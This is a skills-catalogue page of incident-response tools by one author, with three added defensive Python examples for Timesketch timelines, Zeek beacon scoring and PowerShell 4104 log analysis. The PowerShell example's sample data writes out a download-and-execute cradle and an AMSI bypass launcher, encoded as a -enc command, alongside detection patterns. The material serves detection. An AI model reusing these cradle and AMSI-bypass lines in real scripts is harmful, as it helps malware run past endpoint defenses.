Incident Response

Incident Response taxonomy generated by the site skill importer.

26 skills
building-incident-timeline-with-timesketch

by mukul975

building-incident-timeline-with-timesketch helps DFIR teams build collaborative incident timelines in Timesketch by ingesting Plaso, CSV, or JSONL evidence, normalizing timestamps, correlating events, and documenting attack chains for incident triage and reporting.

Incident Triage
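The hard part of ingesting Plaso, CSV and JSONL evidence into one Timesketch timeline is the timestamp normalization the card mentions: each source carries its own convention (Unix seconds, Unix milliseconds, Windows FILETIME, ISO 8601 with a local offset). The following Python is an added example, not code from the skill or from Timesketch. It converts every convention to UTC ISO 8601, emits rows with the message, datetime and timestamp_desc columns the Timesketch CSV/JSONL importer requires, and clusters events that land within a short window so cross-source correlation can start. The JSONL records, the source names and the field names ts, timestamp and EventTime are constructed for the example; telling seconds, milliseconds and FILETIME apart by magnitude is an assumption that is unambiguous for dates after 1973.

```python
import json
from datetime import datetime, timezone

# 100 ns ticks between the Windows FILETIME epoch (1601-01-01) and the Unix epoch.
FILETIME_EPOCH_DELTA = 116444736000000000

# Field names that carry the event time in the constructed sample sources (assumption).
TIMESTAMP_FIELDS = ("datetime", "timestamp", "ts", "EventTime")

# Constructed JSONL evidence: four sources recording the same instant in four conventions,
# plus one CloudTrail-style event five seconds later. Not real data.
SAMPLE_JSONL = """\
{"_source": "zeek/conn.log", "ts": 1700000000, "message": "10.0.0.5 -> 203.0.113.7:443 tcp"}
{"_source": "edr/export.jsonl", "timestamp": 1700000000000, "message": "powershell.exe spawned by winword.exe", "host": "WS-042"}
{"_source": "evtx/Security.evtx", "EventTime": 133444736000000000, "message": "4624 logon from 10.0.0.9", "timestamp_desc": "Logon Time"}
{"_source": "syslog/auth.log", "ts": "2023-11-14T23:13:20+01:00", "message": "Accepted publickey for root from 10.0.0.9"}
{"_source": "cloudtrail.jsonl", "timestamp": "2023-11-14T22:13:25Z", "message": "ConsoleLogin from 203.0.113.7"}
"""


def to_utc_iso(value):
    """Normalize a timestamp of unknown convention to ISO 8601 in UTC.

    Handles ISO 8601 strings (offset or trailing Z; naive values are treated as UTC),
    Unix seconds, Unix milliseconds and Windows FILETIME. Numeric forms are told
    apart by magnitude (assumption: unambiguous for dates after 1973).
    """
    if isinstance(value, str):
        text = value.strip()
        if text.endswith("Z"):
            text = text[:-1] + "+00:00"      # fromisoformat() before Python 3.11 rejects 'Z'
        try:
            dt = datetime.fromisoformat(text)
        except ValueError:
            value = text                     # numeric timestamp stored as a string
        else:
            if dt.tzinfo is None:
                dt = dt.replace(tzinfo=timezone.utc)
            return dt.astimezone(timezone.utc).isoformat()
    if isinstance(value, float):
        n = value
    else:
        try:
            n = int(value)                   # keep FILETIME exact; floats lose precision there
        except ValueError:
            n = float(value)
    if n > 1e16:                             # FILETIME: 100 ns ticks since 1601
        secs = (n - FILETIME_EPOCH_DELTA) / 10_000_000
    elif n > 1e11:                           # Unix milliseconds
        secs = n / 1000
    else:                                    # Unix seconds
        secs = n
    return datetime.fromtimestamp(secs, tz=timezone.utc).isoformat()


def load_jsonl(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def to_timesketch_rows(records):
    """Turn heterogeneous records into Timesketch-importable rows, sorted by time.

    The importer requires message, datetime and timestamp_desc; other fields are
    carried along as extra attributes.
    """
    rows = []
    for rec in records:
        ts_field = next((f for f in TIMESTAMP_FIELDS if f in rec), None)
        if ts_field is None:
            continue                         # no usable timestamp: leave for manual review
        rows.append({
            "datetime": to_utc_iso(rec[ts_field]),
            "timestamp_desc": rec.get("timestamp_desc", "Event Time"),
            "message": rec.get("message") or json.dumps(rec, sort_keys=True),
            "source": rec.get("_source", "unknown"),
        })
    return sorted(rows, key=lambda r: datetime.fromisoformat(r["datetime"]))


def cluster_events(rows, window_seconds=30):
    """Group time-sorted rows into bursts: each event joins the current cluster if it
    falls within window_seconds of the previous event, otherwise starts a new one."""
    clusters = []
    for row in rows:
        t = datetime.fromisoformat(row["datetime"])
        if clusters and (t - clusters[-1]["last"]).total_seconds() <= window_seconds:
            clusters[-1]["events"].append(row)
            clusters[-1]["last"] = t
        else:
            clusters.append({"last": t, "events": [row]})
    return [c["events"] for c in clusters]


if __name__ == "__main__":
    rows = to_timesketch_rows(load_jsonl(SAMPLE_JSONL))
    for burst in cluster_events(rows):
        print(f"burst of {len(burst)} events from {sorted({r['source'] for r in burst})}")
        for r in burst:
            print(f"  {r['datetime']}  {r['source']:22}  {r['message']}")
```

Run the sorted rows through Timesketch's importer (or write them out with csv.DictWriter) once they look right; the FILETIME branch deliberately works in integers because a float cannot represent 1.3e17 ticks exactly, and losing that precision shifts EVTX events by tenths of a second relative to the other sources.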
building-incident-response-playbook

by mukul975

building-incident-response-playbook helps security teams create reusable incident response playbooks with step-by-step phases, decision trees, escalation criteria, RACI ownership, and SOAR-ready structure. It is designed for incident response procedure documentation, incident triage workflows, and audit-friendly operational response plans.

Incident Triage
detecting-beaconing-patterns-with-zeek

by mukul975

detecting-beaconing-patterns-with-zeek helps analyze Zeek conn.log connection intervals to detect C2-style beaconing. It uses ZAT, groups flows by source, destination, and port, and scores low-jitter patterns with statistical checks. Ideal for SOC, threat hunting, incident response, and Security Audit workflows.

Security Audit
building-phishing-reporting-button-workflow

by mukul975

The building-phishing-reporting-button-workflow skill helps you design a phishing report button workflow that preserves the original email, extracts IOCs, classifies reports, and routes triage and feedback for Microsoft 365 or similar email security setups.

Workflow Automation
analyzing-supply-chain-malware-artifacts

by mukul975

analyzing-supply-chain-malware-artifacts is a malware-analysis skill for tracing trojanized updates, poisoned dependencies, and build-pipeline tampering. Use it to compare trusted and untrusted artifacts, extract indicators, assess compromise scope, and report findings with less guesswork.

Malware Analysis
analyzing-security-logs-with-splunk

by mukul975

analyzing-security-logs-with-splunk helps investigate security events in Splunk by correlating Windows, firewall, proxy, and authentication logs into timelines and evidence. It is a practical guide for Security Audit, incident response, and threat hunting.

Security Audit
analyzing-ransomware-network-indicators

by mukul975

analyzing-ransomware-network-indicators helps analyze Zeek conn.log and NetFlow to spot C2 beaconing, TOR exits, exfiltration, and suspicious DNS for Security Audit and incident response.

Security Audit
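Both detecting-beaconing-patterns-with-zeek and analyzing-ransomware-network-indicators rest on the same conn.log technique: group connections by (source, destination, port), take the inter-arrival intervals, and flag tuples whose intervals are too regular to be human traffic. The following Python is an added example, not code from either skill or from ZAT; it reads Zeek's JSON-lines conn.log format with the standard library instead of ZAT and scores regularity with the coefficient of variation (population standard deviation divided by mean interval). The two flows, the addresses and the timestamps are constructed for the example, and the thresholds (at least 6 connections, CV at most 0.2) are assumptions to tune per environment.

```python
import json
import statistics
from collections import defaultdict


def _conn(ts, orig, resp, port):
    """Build one constructed conn.log record in Zeek's JSON-lines form."""
    return json.dumps({"ts": ts, "id.orig_h": orig, "id.resp_h": resp,
                       "id.resp_p": port, "proto": "tcp", "conn_state": "SF"})


# Constructed conn.log sample, not real traffic:
#   flow A: 10.0.0.5 -> 203.0.113.7:443 roughly every 60 s with ~1 s jitter (beacon-like)
#   flow B: 10.0.0.5 -> 198.51.100.9:80 at irregular intervals (browsing-like)
SAMPLE_CONN_LOG = "\n".join(
    [_conn(1700000000 + t, "10.0.0.5", "203.0.113.7", 443)
     for t in (0, 60.4, 120.1, 180.9, 240.3, 300.6, 360.2, 420.8)]
    + [_conn(1700000000 + t, "10.0.0.5", "198.51.100.9", 80)
       for t in (5, 9, 47, 48, 130, 131, 133, 400)]
)


def parse_conn_log(text):
    """Group connection start times by (orig_h, resp_h, resp_p); skips comments and blanks."""
    flows = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rec = json.loads(line)
        key = (rec["id.orig_h"], rec["id.resp_h"], int(rec["id.resp_p"]))
        flows[key].append(float(rec["ts"]))
    return flows


def score_beacons(flows, min_conns=6, max_cv=0.2):
    """Score every tuple with enough connections; low CV of the intervals means low jitter."""
    results = []
    for (src, dst, port), stamps in flows.items():
        if len(stamps) < min_conns:
            continue                       # too few samples for the statistic to mean anything
        stamps = sorted(stamps)
        intervals = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(intervals)
        cv = statistics.pstdev(intervals) / mean if mean > 0 else float("inf")
        results.append({
            "src": src, "dst": dst, "port": port, "count": len(stamps),
            "mean_interval": round(mean, 2), "cv": round(cv, 4),
            "beacon": cv <= max_cv,
        })
    return sorted(results, key=lambda r: r["cv"])


def find_beacons(text, **kwargs):
    """Convenience wrapper: parse a conn.log and return only the flagged tuples."""
    return [r for r in score_beacons(parse_conn_log(text), **kwargs) if r["beacon"]]


if __name__ == "__main__":
    for r in score_beacons(parse_conn_log(SAMPLE_CONN_LOG)):
        flag = "BEACON" if r["beacon"] else "ok"
        print(f"{flag:6} {r['src']} -> {r['dst']}:{r['port']} "
              f"n={r['count']} mean={r['mean_interval']}s cv={r['cv']}")
```

The caveat a hunter will want: a low CV only catches implants with a fixed sleep and small jitter. Frameworks that randomize sleep widely, or that beacon rarely over a long window, will not score as regular, so pair this with the other signals the ransomware card lists (destination reputation, byte ratios, suspicious DNS) rather than treating CV alone as the verdict.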
analyzing-ransomware-leak-site-intelligence

by mukul975

analyzing-ransomware-leak-site-intelligence helps monitor ransomware data leak sites, extract victim and group signals, and produce structured threat intelligence for incident response, sector risk review, and adversary tracking.

Threat Intelligence
detecting-sql-injection-via-waf-logs

by mukul975

Analyze WAF and audit logs to detect SQL injection campaigns with detecting-sql-injection-via-waf-logs. Built for Security Audit and SOC workflows, it parses ModSecurity, AWS WAF, and Cloudflare events, classifies UNION SELECT, OR 1=1, SLEEP(), and BENCHMARK() patterns, correlates sources, and produces incident-oriented findings.

Security Audit
analyzing-golang-malware-with-ghidra

by mukul975

analyzing-golang-malware-with-ghidra helps analysts reverse engineer Go-compiled malware in Ghidra with workflows for function recovery, string extraction, build metadata, and dependency mapping. The analyzing-golang-malware-with-ghidra skill is useful for malware triage, incident response, and Security Audit tasks that need practical, Go-specific analysis steps.

Security Audit
containing-active-breach

by mukul975

containing-active-breach is an incident-response skill for live breach containment. It helps isolate hosts, block suspicious traffic, disable compromised accounts, and slow lateral movement using a structured guide with practical API and script references.

Incident Response
collecting-indicators-of-compromise

by mukul975

collecting-indicators-of-compromise is a skill for extracting, enriching, scoring, and exporting IOCs from incident evidence. Use it for Security Audit workflows, threat intel sharing, and STIX 2.1 output when you need a practical guide instead of a generic incident-response prompt.

Security Audit
building-vulnerability-scanning-workflow

by mukul975

building-vulnerability-scanning-workflow helps SOC teams design a repeatable vulnerability scanning process for discovery, prioritization, remediation tracking, and reporting across assets. It supports Security Audit use cases with scanner orchestration, KEV-aware risk ranking, and workflow guidance beyond a one-off scan.

Security Audit
building-soc-playbook-for-ransomware

by mukul975

building-soc-playbook-for-ransomware is a skill for SOC teams that need a structured ransomware response playbook. It covers detection triggers, containment, eradication, recovery, and audit-ready procedures aligned to NIST SP 800-61 and MITRE ATT&CK. Use it for practical playbook creation, tabletop exercises, and Security Audit support.

Security Audit
building-soc-escalation-matrix

by mukul975

Use the building-soc-escalation-matrix skill to build a structured SOC escalation matrix with severity tiers, response SLAs, escalation paths, and notification rules. It includes a template, standards mapping, workflows, and scripts for practical use in security operations and audit work.

Security Audit
building-incident-response-dashboard

by mukul975

building-incident-response-dashboard helps teams build real-time incident response dashboards in Splunk, Elastic, or Grafana for active incident tracking, containment status, affected assets, IOC spread, and response timelines. Use this skill when you need a focused dashboard for SOC analysts, incident commanders, and leadership.

Dashboard Builder
analyzing-windows-registry-for-artifacts

by mukul975

analyzing-windows-registry-for-artifacts helps analysts extract evidence from Windows Registry hives to identify user activity, installed software, autoruns, USB history, and compromise indicators for incident response or Security Audit workflows.

Security Audit
analyzing-windows-prefetch-with-python

by mukul975

analyzing-windows-prefetch-with-python parses Windows Prefetch (.pf) files with windowsprefetch to reconstruct execution history, flag renamed or masquerading binaries, and support incident triage and malware analysis.

Incident Triage
analyzing-windows-amcache-artifacts

by mukul975

The analyzing-windows-amcache-artifacts skill parses Windows Amcache.hve data to recover evidence of program execution, installed software, device activity, and driver loading for DFIR and security audit workflows. It uses AmcacheParser and regipy-based guidance to support artifact extraction, SHA-1 correlation, and timeline review.

Security Audit
analyzing-threat-actor-ttps-with-mitre-attack

by mukul975

The analyzing-threat-actor-ttps-with-mitre-attack skill helps map threat reports to MITRE ATT&CK tactics, techniques, and sub-techniques, build coverage views, and prioritize detection gaps. It includes a reporting template, ATT&CK references, and scripts for technique lookup and gap analysis, making it useful for CTI, SOC, detection engineering, and threat modeling.

Threat Modeling
analyzing-powershell-empire-artifacts

by mukul975

The analyzing-powershell-empire-artifacts skill helps Security Audit teams detect PowerShell Empire artifacts in Windows logs using Script Block Logging, Base64 launcher patterns, stager IOCs, module signatures, and detection references for triage and rule writing.

Security Audit
analyzing-powershell-script-block-logging

by mukul975

analyzing-powershell-script-block-logging is a skill for parsing Windows PowerShell Script Block Logging Event ID 4104 from EVTX files, reconstructing split script blocks, and flagging obfuscated commands, encoded payloads, Invoke-Expression abuse, download cradles, and AMSI bypass attempts for Security Audit work.

Security Audit
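The two PowerShell cards, analyzing-powershell-empire-artifacts and analyzing-powershell-script-block-logging, share one processing core: Event ID 4104 splits a long script across several events that carry the same ScriptBlockId with MessageNumber and MessageTotal, so the fragments must be reassembled in order before any pattern is meaningful, and a Base64 -EncodedCommand launcher must be decoded (it is Base64 over UTF-16LE text) and scanned separately from its wrapper. The following Python is an added example, not code from either skill; it works on 4104 records already extracted to dictionaries (for example with python-evtx or Get-WinEvent, which is out of scope here) and flags Invoke-Expression use, download cradles, AMSI tampering and encoded commands. The records and the script text are constructed for the example, and the indicator regexes are an assumption, not Empire's own signatures.

```python
import base64
import binascii
import re
from collections import defaultdict

# Indicator patterns (assumption: a minimal set for the example, not a complete rule set).
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
    "amsi_bypass": re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer", re.I),
}
# Common spellings of the EncodedCommand switch (PowerShell accepts any unambiguous prefix).
ENCODED_CMD = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def _enc(ps):
    """Encode text the way powershell -EncodedCommand expects (Base64 over UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed script text for the sample records; the URLs are documentation addresses.
CRADLE = ("$wc = New-Object System.Net.WebClient; "
          "$s = $wc.DownloadString('http://192.0.2.7/a.ps1'); Invoke-Expression $s")
LAUNCHER = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
            ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
            "$wc = New-Object Net.WebClient; IEX $wc.DownloadString('http://192.0.2.7/launcher')")

# Constructed 4104 records as dictionaries of the event's EventData fields. Block a1 arrives
# out of order in two fragments, c3 is an encoded launcher, d4 is missing fragments.
SAMPLE_4104 = [
    {"ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2, "ScriptBlockText": CRADLE[60:], "Path": ""},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length", "Path": "C:\\Scripts\\inventory.ps1"},
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2, "ScriptBlockText": CRADLE[:60], "Path": ""},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "powershell -noP -sta -w 1 -enc " + _enc(LAUNCHER), "Path": ""},
    {"ScriptBlockId": "d4", "MessageNumber": 1, "MessageTotal": 3, "ScriptBlockText": "function Get-Inventory {", "Path": ""},
]


def decode_encoded_command(b64):
    """Decode an -EncodedCommand payload; None if it is not valid Base64 over UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def reassemble(records):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order and note missing pieces."""
    fragments = defaultdict(dict)
    meta = {}
    for r in records:
        sbid = r["ScriptBlockId"]
        fragments[sbid][int(r["MessageNumber"])] = r["ScriptBlockText"]
        meta[sbid] = {"total": int(r["MessageTotal"]), "path": r.get("Path", "")}
    blocks = []
    for sbid, parts in fragments.items():
        blocks.append({"script_block_id": sbid, "path": meta[sbid]["path"],
                       "text": "".join(parts[i] for i in sorted(parts)),
                       "complete": len(parts) == meta[sbid]["total"]})
    return blocks


def analyze_script_blocks(records):
    """Reassemble, then flag indicators in each block and, separately, in any decoded payload."""
    results = []
    for block in reassemble(records):
        text, flags, decoded_text, decoded_flags = block["text"], set(), None, set()
        m = ENCODED_CMD.search(text)
        if m:
            flags.add("encoded_command")
            decoded_text = decode_encoded_command(m.group(1))
            text = text[:m.start(1)] + text[m.end(1):]        # scan the wrapper without the blob
            if decoded_text is not None:
                decoded_flags = {n for n, rx in INDICATORS.items() if rx.search(decoded_text)}
        flags |= {n for n, rx in INDICATORS.items() if rx.search(text)}
        block.update(flags=flags, decoded_text=decoded_text, decoded_flags=decoded_flags)
        results.append(block)
    return results


if __name__ == "__main__":
    for b in analyze_script_blocks(SAMPLE_4104):
        print(f"{b['script_block_id']} complete={b['complete']} flags={sorted(b['flags'])} "
              f"decoded={sorted(b['decoded_flags'])}")
```

Two points worth keeping in mind when turning this into rules: the wrapper of an encoded launcher looks harmless on its own, so the verdict has to come from the decoded text, and an incomplete block (fewer fragments than MessageTotal) usually means the EVTX was truncated or the log rolled, which is itself worth recording in the triage notes.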
analyzing-persistence-mechanisms-in-linux

by mukul975

The analyzing-persistence-mechanisms-in-linux skill helps investigate Linux persistence after compromise, including crontab jobs, systemd units, LD_PRELOAD abuse, shell profile changes, and SSH authorized_keys backdoors. It is designed for incident response, threat hunting, and security audit workflows with auditd and file-integrity checks.

Security Audit
analyzing-mft-for-deleted-file-recovery

by mukul975

analyzing-mft-for-deleted-file-recovery helps recover deleted-file metadata and possible path or content evidence by analyzing NTFS $MFT records, $LogFile, $UsnJrnl, and MFT slack space. Built for DFIR and Security Audit workflows with MFTECmd, analyzeMFT, and X-Ways Forensics.

Security Audit